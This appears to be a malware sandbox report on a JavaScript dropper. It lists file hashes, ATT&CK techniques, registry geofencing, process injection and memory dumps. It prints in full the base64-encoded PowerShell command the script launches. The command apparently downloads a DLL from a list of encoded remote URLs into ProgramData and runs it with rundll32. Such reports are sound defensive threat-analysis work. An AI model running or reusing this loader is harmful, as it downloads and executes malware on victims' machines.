b39af4a985c362fa7e32f051c89d207af62493cf3a7146865c8cafe52743b6f7

General

Target

XdIV7MN285536.js
Size

337KB
MD5

0d0013ce644021995e5f758444d8d0f9
SHA1

eef4d76239bd5f3b2fae7b54963d70ba69669ecd
SHA256

b39af4a985c362fa7e32f051c89d207af62493cf3a7146865c8cafe52743b6f7
SHA512

a7d536c14e1d2befd77a6beae226b80690412dd61648c83ac9912b0f56c5bcabfb6ea9c3fac6740697af10d07a1c1203f7af22d1cc46a667a3c5907727e61696
SSDEEP

6144:bSfr0dh2tgcH6YTkM0cNRcpZwg/EBQ+8N/ygD1pRbWj0P/eaHtHukcOdBezX6Kml:bSfrSh2tgcH6YTkMXRcpZwg/QQ+I/ygl

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 7 IoCs

flow	pid	Process
26	4748	powershell.exe
28	4748	powershell.exe
31	4748	powershell.exe
33	4748	powershell.exe
34	4748	powershell.exe
35	4748	powershell.exe
36	4748	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4748	powershell.exe
4748	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4748	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 4120 wrote to memory of 4748	4120	wscript.exe	83
PID 4120 wrote to memory of 4748	4120	wscript.exe	83

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\XdIV7MN285536.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABUAG8AdQBjAGgAbQBhAHIAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBAHkAQQBDADQAQQBNAGcAQQB5AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AZwBBAHUAQQBEAEUAQQBPAFEAQQB5AEEAQQA9AD0AaQB6AGIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABnAEEAYwBBAEIAcwBBAEcAVQBBAGQAQQBCAHYAQQBIAEkAQQBlAFEAQQB1AEEARwBrAEEAYgBRAEEAPQBpAHoAYgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHoAQQBHADAAQQBZAFEAQgB5AEEASABRAEEAYQBRAEIAegBBAEcAMABBAEwAZwBCAGoAQQBHAHcAQQBkAFEAQgBpAEEAQQA9AD0AIgA7ACQATQBhAHQAaABlAHQAaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBFAEEAYgBRAEIAdABBAEcARQBBAGMAZwBCAHAAQQBHADQAQQBaAFEAQgBWAEEARwA0AEEAYwBnAEIAbABBAEcAMABBAGIAdwBCADIAQQBHAEUAQQBZAGcAQgBzAEEASABrAEEATABnAEIAawBBAEcAVQBBAGIAZwBCADAAQQBHAEUAQQBiAEEAQQB2AEEARABrAEEATAB3AEIAMABBAEEAPQA9AFAAaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAFUAQQBlAEEAQgB3AEEARwBVAEEAYgBBAEIAcwBBAEcAVQBBAGIAZwBCADAAQQBGAFUAQQBiAGcAQgB3AEEARwBFAEEAYgBnAEIAMABBAEcAZwBBAFoAUQBCAHAAQQBIAE0AQQBkAEEAQgBwAEEARwBNAEEAWQBRAEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBIAEEAQQBhAEEAQgB2AEEASABRAEEAYgB3AEIAbgBBAEgASQBBAFkAUQBCAHcAQQBHAGcAQQBlAFEAQQB2AEEARwBZAEEAUQBRAEEAMQBBAEcAUQBBAFIAdwBBAHYAQQBGAG8AQQBTAHcAQQA9AFAAaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBiAHcAQgB5AEEASABBAEEAYQBBAEIAaABBAEcANABBAFoAUQBCAGsAQQBDADQAQQBiAGcAQgBzAEEAQwA4AEEAVQBRAEEAeQBBAEcAYwBBAGIAQQBCAG0AQQBDADgAQQBRAHcAQQA9AFAAaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAFkAQQBZAFEAQgB5AEEASABJAEEAWQBRAEIAbgBBAEcAOABBAGMAdwBBAHUAQQBHAEkAQQBZAFEAQgB1AEEARwBRAEEATAB3AEIANABBAEUAdwBBAFQAZwBCAG4AQQBHAFUAQQBMAHcAQgBPAEEASABNAEEAVgBnAEIAMQBBAEcAawBBAFAAaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQB4AEEARABnAEEATgBRAEEAdgBBAEUAMABBAFEAUQBBADAAQQBHAGMAQQBPAFEAQQB2AEEARwBVAEEAVAB3AEEAMgBBAEcAOABBAE0AZwBBAHoAQQBEAGcAQQBjAEEAQQB5AEEARgBjAEEAUQBnAEEAPQBQAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATwBBAEEAdQBBAEQASQBBAE4AUQBBADEAQQBDADQAQQBNAGcAQQB4AEEARABNAEEATABnAEEAeQBBAEQAQQBBAE4AUQBBAHYAQQBIAEUAQQBhAGcAQgBSAEEARQBrAEEAVABnAEIAaABBAEQATQBBAEwAdwBCAHIAQQBIAGcAQQBaAFEAQQAwAEEARQB3AEEATQBRAEIAWgBBAEQAYwBBAGIAQQBCAFIAQQBBAD0APQBQAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATQBRAEEAMABBAEQAawBBAEwAdwBCAFIAQQBHADAAQQBWAGcAQgBsAEEASABBAEEATAB3AEIAVQBBAEYARQBBAFMAQQBCAHMAQQBIAG8AQQBTAGcAQQA9ACIAOwAkAEMAbwBuAGMAZQBwAHQAdQBhAGwAaQB6AGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQASQBBAE8AQQBBAHUAQQBEAEkAQQBNAHcAQQB4AEEAQwA0AEEATQBRAEEAeQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBOAEEAQQA9AG0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBBAEEAdQBBAEQAawBBAE0AUQBBAHUAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATgBRAEEAdwBBAEEAPQA9ACIAOwAkAGUAcgBpAHMAdABpAGMARQB1AHAAaAByAGEAcwBpAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAGcAQgAwAEEASABJAEEAWQBRAEIAMABBAEgASQBBAGIAdwBCAHcAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEATABnAEIAagBBAEcARQBBAGMAQQBCAGwAQQBIAFEAQQBiAHcAQgAzAEEARwA0AEEATABDAEkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABjAEEATABnAEEAMQBBAEQAQQBBAEwAZwBBAHgAQQBEAEUAQQBNAGcAQQB1AEEARABFAEEATgBnAEEAMgBBAEEAPQA9AEwAQwBJAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE0AdwBBAHUAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATQBBAEEAMwBBAEMANABBAE0AUQBBADAAQQBEAFEAQQBMAEMASQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGcAQQBNAEEAQQB1AEEARABRAEEATgBRAEEAdQBBAEQAWQBBAE4AQQBBAHUAQQBEAEkAQQBNAGcAQQB6AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcgBlAGYAbABlAHgAaQBvAG4AYQBsACAAaQBuACAAJABNAGEAdABoAGUAdABpAGMAIAAtAHMAcABsAGkAdAAgACIAUABpACIAKQAgAHsAdAByAHkAIAB7ACQATQBhAHIAcgBlAGwAbABhAE8AYgBzAG8AbABlAHQAaQBzAG0AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAEEAQQAyAEEAQwA0AEEATQBRAEEAMABBAEQAQQBBAEwAZwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABJAEEATQBnAEEAegBBAEEAPQA9AGoAUgB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbQBBAEcAOABBAGMAZwBCAGwAQQBHAFkAQQBaAFEAQgBzAEEASABRAEEATABnAEIAaQBBAEgAbwBBAGEAQQBBAD0AagBSAHUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMQBBAEMANABBAE0AZwBBADAAQQBEAFUAQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQASQBBAE4AUQBBAD0AIgA7ACQARABpAHMAcwBlAHYAZQByAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQBmAGwAZQB4AGkAbwBuAGEAbAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEQAaQBzAHMAZQB2AGUAcgBpAG4AZwAgAC0ATwAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABNAG8AbABlAHMAdABpAG8AdQBzAFcAaQBmAGUAYwBhAHIAbAAuAGQAbABsADsAJABXAGgAZQB3AGUAbABsAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMQBBAEMANABBAE0AUQBBADIAQQBEAEkAQQBMAGcAQQB5AEEARABNAEEATgB3AEEAdQBBAEQARQBBAE4AdwBBAHgAQQBBAD0APQBUAHMATwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBZAHcAQgB2AEEARwAwAEEAYwBBAEIAeQBBAEcAVQBBAGMAdwBCAHoAQQBHAFUAQQBaAEEAQQB1AEEASABjAEEAYQBRAEIAdQBBAEcAVQBBAFQAcwBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCAHMAQQBIAFkAQQBhAFEAQgBzAEEARwB3AEEAWgBRAEEAdQBBAEcAawBBAGIAdwBBAD0AVABzAE8AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBnAEEAZQBRAEIAaABBAEcAVQBBAGIAZwBCAGgAQQBDADQAQQBZAHcAQgB2AEEAQQA9AD0AIgA7ACQATgB1AHQAdABpAG4AZQBzAHMAUgBlAHAAcgBhAGkAcwBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQA0AEEAWQBRAEIAMABBAEcAawBBAFoAZwBCAHYAQQBIAEkAQQBiAFEAQQB1AEEARwBZAEEAZQBRAEIAcABBAEEAPQA9AGMAcwBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUANABBAFkAUQBCADAAQQBHAEUAQQBiAEEAQgBwAEEASABRAEEAZQBRAEIAVABBAEcAZwBBAFkAUQBCAHQAQQBHADAAQQBZAFEAQgB6AEEARwBnAEEAYQBRAEIAdABBAEMANABBAGMAdwBCADEAQQBHAE0AQQBhAHcAQgB6AEEAQQA9AD0AYwBzAGcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBrAEEAYgBnAEIAMABBAEcAVQBBAGIAUQBCAGwAQQBIAEkAQQBZAFEAQgAwAEEARwBVAEEAYgBnAEIAbABBAEgATQBBAGMAdwBBAHUAQQBIAFkAQQBhAFEAQgBoAEEARwBvAEEAWgBRAEIAegBBAEEAPQA9AGMAcwBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQASQBBAEwAZwBBADMAQQBEAEUAQQBMAGcAQQB5AEEARABNAEEATQBRAEEAdQBBAEQARQBBAE8AQQBBAHgAQQBBAD0APQAiADsAJAB3AGgAZQByAGUAYQBiAG8AdQB0AHMAQwBvAG4AbwBsAG8AcABoAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBADUAQQBDADQAQQBNAFEAQQA1AEEARABjAEEATABnAEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBOAEEAQQAwAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATQBvAGwAZQBzAHQAaQBvAHUAcwBXAGkAZgBlAGMAYQByAGwALgBkAGwAbAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADgANgA2ADgAMAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBZAHcAQgB0AEEARwBRAEEASQBBAEEAdgBBAEcATQBBAEkAQQBCAHkAQQBIAFUAQQBiAGcAQgBrAEEARwB3AEEAYgBBAEEAegBBAEQASQBBAEkAQQBCAEQAQQBEAG8AQQBYAEEAQgBRAEEASABJAEEAYgB3AEIAbgBBAEgASQBBAFkAUQBCAHQAQQBFAFEAQQBZAFEAQgAwAEEARwBFAEEAWABBAEIATgBBAEcAOABBAGIAQQBCAGwAQQBIAE0AQQBkAEEAQgBwAEEARwA4AEEAZABRAEIAegBBAEYAYwBBAGEAUQBCAG0AQQBHAFUAQQBZAHcAQgBoAEEASABJAEEAYgBBAEEAdQBBAEcAUQBBAGIAQQBCAHMAQQBDAHcAQQBiAFEAQgAxAEEASABNAEEAZABBAEEANwBBAEEAPQA9ACIAOwAkAE8AZgBmAGkAYwBlAGgAbwBsAGQAZQByAEQAZQBjAGkAYQByAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAFUAQQBNAHcAQQB1AEEARABFAEEATgBBAEEANQBBAEMANABBAE8AQQBBADUAQQBBAD0APQBNAHkAYgB5AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBAHgAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATABnAEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAFkAQQBNAEEAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AH0AfQA="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4748

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5434klig.ppt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4748-133-0x00000238EE820000-0x00000238EE842000-memory.dmp

Filesize
136KB

Download
memory/4748-143-0x00000238EEA80000-0x00000238EEA90000-memory.dmp

Filesize
64KB

Download
memory/4748-145-0x00000238EEA80000-0x00000238EEA90000-memory.dmp

Filesize
64KB

Download
memory/4748-144-0x00000238EEA80000-0x00000238EEA90000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing